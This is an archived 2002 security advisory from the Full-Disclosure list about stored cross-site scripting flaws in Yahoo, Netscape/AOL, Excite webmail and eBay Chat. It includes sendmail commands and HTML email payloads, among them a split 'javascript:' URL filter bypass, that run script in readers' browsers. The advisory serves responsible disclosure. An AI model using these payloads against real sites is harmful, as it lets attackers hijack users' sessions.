iDEFENSE Security Advisory 08.19.2002 Cross-Site Scripting (XSS) Vulnerabilities in Popular Web Applications Yahoo Mail http://mail.yahoo.com Netscape Mail http://webmail.netscape.com AOL Webmail http://webmail.aol.com (same as Netscape Mail) Excite Mail http://mail.excite.com eBay Chat http://pages.ebay.com/community/chat/index.html DESCRIPTION Many Web Applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." Web Applications not meticulously filtering this untrusted content before presenting the web page to the user may allow for the manipulation of the web page and its content interpretation by a web browser. This issue becomes dangerous when untrusted content is able to be inserted into a dynamic HTML web page via a web application or other means, causing the content to execute potentially malicious code within a users browser with the exact same privileges of the ligitimate web server. Some Web Applications such as Yahoo Mail and others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, obfuscated content may elude the current filters and execute within the users browser environment. Allowing the attacker to target users almost instantly without relying on the user performing any activities other than normal usage. All vulnerabilties affect either Microsoft Internet Explorer Browser or Netscape or both. These types of XSS vulnerabilities are usually classified as "constant- state", as they exist persistently for more than just one HTTP request. More detailed XSS exploitation scenarios are detailed in an iDEFENSE paper available at http://www.idefense.com/XSS.html. ANALYSIS *** Yahoo Mail *** The following XSS vulnerability only existed for Netscape 4.x browsers (see Vendor Response, this issue in Yahoo has since been addressed): bash$ sendmail -t targetat_private Paste the following email message -------------------------------------------------- MIME-Version: 1.0 From: Attack <attackerat_private> Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: XSS Attack <HTML><BODY> <ILAYER SRC="script.js"></ILAYER> </BODY></HTML> . -------------------------------------------------- *** Netscape/AOL Webmail *** This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com). The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x: bash$ sendmail -t targetat_private Paste the following email message -------------------------------------------------- MIME-Version: 1.0 From: Attack <attackerat_private> Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: XSS Attack <HTML><BODY> <IMG SRC="javasc
ript:alert('test');"> </BODY></HTML> . -------------------------------------------------- *** Excite Webmail *** It would seem that Excite does not perform any filtering of HTML/SCRIPT whatsoever. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x/6.x: bash$ sendmail -t targetat_private Paste the following email message -------------------------------------------------- MIME-Version: 1.0 From: Attack <attackerat_private> Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: XSS Attack <HTML><BODY> <SCRIPT>alert(document.domain);</SCRIPT> </BODY></HTML> . -------------------------------------------------- *** eBay Chat *** While you are logged in as an eBay user, place the text sting below within the chat text field and click submit. The message will appear within the main chat text message and will execute in a user's browser when read. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x: ---- XSS String ------------------------------------ <IMG SRC="javasc
ript:alert(document.domain);"> ---------------------------------------------------- DISCOVERY CREDIT Jeremiah Grossman (jeremiahat_private) Lex Arquette (lexat_private) VENDOR RESPONSE July 16, 2002 - Scott Renfro (scottr@yahoo-inc.com), title "Paranoid Yahoo", responded and issue was fixed. DISCLOSURE TIMELINE June 27, 2002 Exclusively Disclosed to iDEFENSE July 16, 2002 Ebay, AOL/Netscape, Yahoo, and Excite notified July 16, 2002 iDEFENSE Client Disclosure August 11, 2002 Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems August 19, 2002 Still no response from Excite, AOL/Netscape, or eBay - Public Disclosure http://www.idefense.com/contributor.html David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendlerat_private www.idefense.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 06:05:37 PDT